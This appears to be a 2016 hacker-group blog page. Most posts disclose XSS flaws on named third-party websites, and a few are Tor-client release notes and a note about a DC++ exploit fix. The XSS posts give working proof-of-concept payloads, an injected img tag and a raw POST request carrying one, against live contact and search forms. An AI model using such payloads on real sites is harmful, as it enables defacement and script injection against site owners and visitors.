This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
216.73.216.198.US.SSL

Secure Application - XSS

Vulnerable page: http://www.secureapplication.org/contact-us.php

PoC
"><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC


It is enough to insert any XSS code directly into contact form fields and your code will be executed and displayed immediately.

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
Posted by Neo on 2016-08-22 22:41 0 comments 2 likes

Advanced Onion Router AdvOR 0.3.0.24

Another GeoIP update.

Changes in 0.3.0.24
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 123310 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries

File information: AdvOR 0.3.0.24
Posted by advor on 2016-06-12 13:31 0 comments 9 likes

Another NMDC exploit fix: ApexDC++ 1.6.2

ApexDC++
Finally, after a couple of years, ApexDC++ developers have fixed the NMDC search exploit that I was speaking about earlier. Everyone should update to latest version 1.6.2. Now I also can say that only StrongDC++ is left of all the popular clients. good
Posted by RoLex on 2016-05-28 19:01 0 comments 9 likes

Advanced Onion Router AdvOR 0.3.0.23

Due to new OpenSSL vulnerabilities the library was updated to latest version 1.0.2h.

Changes in 0.3.0.23
- the OpenSSL library was updated to openssl-1.0.2h
- geoip_c.h was updated with GeoIPCountryWhois.csv released on May 3'rd; there are 121733 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries

File information: AdvOR 0.3.0.23
Posted by advor on 2016-05-14 13:56 4 comments 12 likes

Technicolor.com search form XSS bug

Vulnerable page: http://www.technicolor.com/search/

In order to reproduce the bug, you have to replace any forward slash / with backslash \ because forward slash is being URL encoded.

PoC
POST /search/ HTTP/1.1
Host: www.technicolor.com
search_block_form=<img src=http:\\te-home.net\gallery\xssd_by_teamelite.png>

You can either include any XSS code in search input box, or request any XSS code directly using POST method and search_block_form parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-05-08 22:41 1 comment 7 likes